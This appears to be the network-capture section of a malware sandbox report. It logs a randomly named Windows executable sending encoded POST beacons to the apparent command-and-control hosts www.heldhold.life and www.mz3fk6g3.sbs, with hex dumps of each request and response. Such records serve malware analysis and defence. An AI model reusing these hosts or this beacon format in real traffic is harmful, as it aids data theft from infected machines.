7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69
                                                                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi
                                                                                              Apr 24, 2024 07:26:52.731362104 CEST451INData Raw: 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f
                                                                                              Data Ascii: ce-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.go


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.449749172.217.16.36801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:26:55.165807009 CEST454OUTGET /3g97/?12l42=ZDaHJbFbnHAFPJixhC0W5VJcO+3r+/EbU9/fBM2jNZ9+Ym38hIZ/X5pUYkV2fcPscAyJxVIUpy5G03sBlccn/BoOXNW31gfQYe8OGfTtnGJDjF2r8y9L4VM=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.mz3fk6g3.sbs
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:26:55.586297035 CEST1289INHTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Referrer-Policy: no-referrer
                                                                                              Content-Length: 1566
                                                                                              Date: Wed, 24 Apr 2024 05:26:55 GMT
                                                                                              Connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69
                                                                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-devi
                                                                                              Apr 24, 2024 07:26:55.586327076 CEST451INData Raw: 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f
                                                                                              Data Ascii: ce-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.go


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.449750203.161.46.103801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:02.680174112 CEST728OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.heldhold.life
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.heldhold.life
                                                                                              Referer: http://www.heldhold.life/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 72 63 75 4c 78 7a 47 56 68 50 69 39 54 4a 2b 66 48 78 4c 48 6d 66 2b 5a 32 4c 6f 58 48 55 78 52 52 62 63 72 76 66 47 77 6e 55 79 6d 63 75 65 77 66 37 62 37 51 4c 5a 69 37 68 6f 65 4c 44 59 53 7a 65 52 62 7a 63 55 73 65 63 7a 50 68 76 38 58 6d 48 66 73 52 33 78 38 76 4b 50 70 51 52 66 44 76 44 65 71 4e 68 79 65 54 76 5a 39 4b 38 4b 63 73 6f 6e 56 45 53 68 47 68 41 54 32 6e 53 34 78 4e 2b 66 48 50 71 68 76 74 6e 53 59 69 67 43 65 33 69 50 59 59 33 6c 2b 4c 4d 34 53 51 4d 4e 53 74 62 66 6e 68 52 70 36 4c 45 38 59 4f 7a 4e 4d 32 79 65 43 70 35 2b 30 49 2b 42 35 37 65 73 4a 70 67 3d 3d
                                                                                              Data Ascii: 12l42=rcuLxzGVhPi9TJ+fHxLHmf+Z2LoXHUxRRbcrvfGwnUymcuewf7b7QLZi7hoeLDYSzeRbzcUseczPhv8XmHfsR3x8vKPpQRfDvDeqNhyeTvZ9K8KcsonVEShGhAT2nS4xN+fHPqhvtnSYigCe3iPYY3l+LM4SQMNStbfnhRp6LE8YOzNM2yeCp5+0I+B57esJpg==
                                                                                              Apr 24, 2024 07:27:02.859771967 CEST533INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:02 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.449751203.161.46.103801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:05.371216059 CEST748OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.heldhold.life
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.heldhold.life
                                                                                              Referer: http://www.heldhold.life/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 72 63 75 4c 78 7a 47 56 68 50 69 39 52 6f 4f 66 42 51 4c 48 6b 2f 2b 59 76 4c 6f 58 4e 30 78 64 52 62 41 72 76 66 75 67 6b 6e 61 6d 63 50 75 77 65 35 7a 37 56 4c 5a 69 78 42 6f 66 46 6a 59 6a 7a 65 4e 74 7a 64 6f 73 65 63 58 50 68 75 4d 58 68 77 4c 7a 4c 48 78 36 6a 71 50 72 61 78 66 44 76 44 65 71 4e 69 50 4a 54 76 42 39 4b 6f 4f 63 74 4a 6e 61 61 43 68 4a 32 77 54 32 74 79 34 39 4e 2b 66 66 50 75 41 4b 74 69 57 59 69 6b 4b 65 33 32 62 58 57 33 6c 34 56 38 35 48 44 4e 63 61 72 59 32 54 68 58 39 47 49 6e 55 7a 50 31 63 57 6e 44 2f 56 37 35 61 48 56 35 49 4e 32 64 52 41 79 69 35 31 79 74 46 65 6f 6d 6e 61 56 75 37 5a 77 75 51 34 54 39 30 3d
                                                                                              Data Ascii: 12l42=rcuLxzGVhPi9RoOfBQLHk/+YvLoXN0xdRbArvfugknamcPuwe5z7VLZixBofFjYjzeNtzdosecXPhuMXhwLzLHx6jqPraxfDvDeqNiPJTvB9KoOctJnaaChJ2wT2ty49N+ffPuAKtiWYikKe32bXW3l4V85HDNcarY2ThX9GInUzP1cWnD/V75aHV5IN2dRAyi51ytFeomnaVu7ZwuQ4T90=
                                                                                              Apr 24, 2024 07:27:05.556513071 CEST533INHTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:05 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 389
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.449752203.161.46.103801620C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Apr 24, 2024 07:27:08.074906111 CEST10830OUTPOST /3g97/ HTTP/1.1
                                                                                              Host: www.heldhold.life
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.heldhold.life
                                                                                              Referer: http://www.heldhold.life/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Raw: 31 32 6c 34 32 3d 72 63 75 4c 78 7a 47 56 68 50 69 39 52 6f 4f 66 42 51 4c 48 6b 2f 2b 59 76 4c 6f 58 4e 30 78 64 52 62 41 72 76 66 75 67 6b 6e 43 6d 63 38 32 77 63 59 7a 37 57 4c 5a 69 79 42 6f 53 46 6a 59 45 7a 65 56 78 7a 64 6b 6a 65 65 66 50 67 4d 30 58 6b 42 4c 7a 65 58 78 36 2b 61 50 6f 51 52 66 53 76 43 75 75 4e 68 6e 4a 54 76 42 39 4b 70 2b 63 37 6f 6e 61 59 43 68 47 68 41 54 71 6e 53 35 71 4e 36 7a 50 50 76 42 2f 74 52 75 59 68 46 32 65 37 6c 7a 58 65 33 6c 36 55 38 34 45 44 4e 51 56 72 59 71 70 68 58 68 6f 49 6b 49 7a 4f 55 35 78 36 44 72 46 67 70 2b 5a 4c 2b 6c 71 32 73 6c 48 71 44 31 57 2f 4e 70 68 2b 6b 54 4c 58 38 79 74 73 75 41 74 50 4b 72 39 74 55 55 63 45 58 6d 38 7a 65 61 74 2f 66 44 76 45 69 7a 46 56 68 2f 6a 53 43 4b 33 61 30 52 6a 77 57 35 65 62 6f 6e 41 2b 49 5a 46 67 2f 34 79 6f 41 50 4c 6e 69 42 6c 4b 35 51 70 50 4e 78 74 41 64 39 4b 75 59 4c 77 47 45 43 71 59 48 78 68 6d 75 7a 76 44 61 37 79 5a 5a 48 52 6a 73 6c 70 74 71 47 50 66 43 61 54 35 34 47 4c 7a 55 78 48 31 57 67 49 4c 4a 59 6b 50 4e 78 65 76 46 4a 75 51 59 36 50 38 4a 4a 30 33 6a 41 38 6c 39 66 79 50 4e 67 48 6b 59 51 45 6d 69 75 79 32 55 31 33 61 31 4b 47 70 54 76 39 75 58 4f 43 43 54 2b 4d 55 37 70 52 52 2b 4e 42 5a 70 67 62 47 64 49 31 4b 6c 2f 38 6d 64 57 6b 36 4f 55 65 73 55 59 59 33 57 43 71 57 79 4e 32 44 41 36 41 66 70 45 6d 51 67 70 72 33 39 66 44 36 51 35 33 73 5a 75 4a 64 68 48 32 42 42 75 31 43 44 64 39 34 67 4c 72 45 5a 62 76 4e 46 36 2b 4b 59 38 48 71 4f 37 50 46 59 78 75 41 47 39 2b 45 38 77 72 46 46 2b 2b 76 57 4f 66 64 41 6b 64 66 30 65 66 72 4d 71 4d 55 64 55 34 2b 36 65 2b 75 31 78 62 6e 41 45 30 69 35 79 35 65 64 4d 69 6d 30 33 39 66 6c 47 73 65 78 70 70 6f 32 53 42 33 30 70 6a 54 4e 5a 76 51 49 64 58 39 2b 43 51 70 78 64 74 62 4c 73 34 64 55 65 31 42 77 33 73 4b 62 77 4e 4c 53 49 32 37 75 4c 30 48 66 45 73 6d 41 73 73 50 48 74 68 66 6b 6d 63 6b 69 6d 6b 50 51 66 30 52 6f 30 53 48 4f 6d 70 75 35 2f 6e 43 64 30 55 67 48 77 49 2f 33 63 43 74 68 59 41 69 7a 6c 4d 69 45 58 6d 63 68 33 37 55 33 4f 30 36 51 2b 43 51 58 66 45 73 44 53 31 58 72 63 79 42 34 4f 32 55 59 4d 32 66 54 47 55 74 36 78 66 6f 37 39 75 51 4b 47 42 4d 61 76 61 53 73 64 46 70 30 52 61 39 2b 44 7a 67 44 38 71 77 67 70 75 6d 67 78 50 47 41 4d 2f 73 4c 47 72 52 31 58 70 46 35 38 59 69 38 49 59 6b 72 4c 4e 48 53 47 5a 45 36 59 56 51 50 43 7a 46 4d 68 35 47 2f 33 46 4d 75 58 70 70 4e 57 7a 4e 42 32 36 63 37 57 46 37 59 56 64 32 77 67 7a 76 41 64 66 52 6e 38 63 58 61 45 66 36 79 4f 75 36 68 2b 6e 7a 4e 44 72 74 65 61 77 62 56 4b 58 45 2f 38 6f 2f 39 4e 50 6a 46 34 61 73 6f 46 76 6c 61 42 30 58 6f 4c 50 67 6e 66 57 69 33 51 2f 4c 36 52 67 6d 6e 78 44 59 41 76 37 68 38 6a 42 2b 57 76 5a 56 4f 65 42 65 68 2b 34 2b 67 4e 34 4c 53 42 70 58 6a 62 44 46 44 52 6a 73 79 4d 4f 65 38 6e 56 67 6b 50 2f 36 68 30 4e 70 67 37 6b 77 59 6f 77 68 59 38 58 64 74 4d 42 75 38 2b 6f 32 50 65 41 57 54 71 62 71 4d 63 4f 35 37 51 53 61 2f 6c 45 5a 64 2f 63 47 2b 72 76 63 51 4e 4d 32 37 66 34 69 54 36 75 68 44 6c 57 67 65 79 66 4c 2f 46 49 48 4d 78 74 79 35 4e 41 44 54 41 78 6f 54 61 37 41 4a 59 71 38 7a 66 79 6d 62 53 63 4b 4f 2f 6e 39 39 6a 68 56 75 59 43 73 49 55 30 4a 76 4b 75 6e 52 37 2b 5a 32 34 4e 4d 4e 51 32 68 65 42 64 62 55 53 50 51 72 49 4f 71 39 36 4d 70 65 48 2f 38 30 4c 43 4e 76 30 32 61 30 64 36 52 76 72 50 65 34 41 4f 56 38 48 31 45 30 45 56 74 2b 42 6c 41 46 77 4d 2f 2f 59 38 30 35 4e 75 52 42 31 62 7a 39 2f 4f 77 4d 50 66 35 37 53 58 45 57 4e 30 45 63 36 33 61 78 63 57 78 70 47 79 51 63 5a 62 4b 6b 43 34 58 4a 74 63 55 33 37 58 67 37 52 49 75 68 71 73 6a 6e 71 4b 64 61 54 42 57 33 72 68 62 4a 5a 46 78 75 67 62 49 42 62 43 6f 66 38 52 70 68 74 62 79 34 66 2b 71 72 63 6c 2b 4b 63 42 44 42 36 41 30 6a 4a 5a 5a 4f 54 49 56 4c 4c 7a 4f 53 4a 6f 4b 63 49 4c 56 6d 56 38 4f 48 6e 6e 6b 57 79 38 30 45 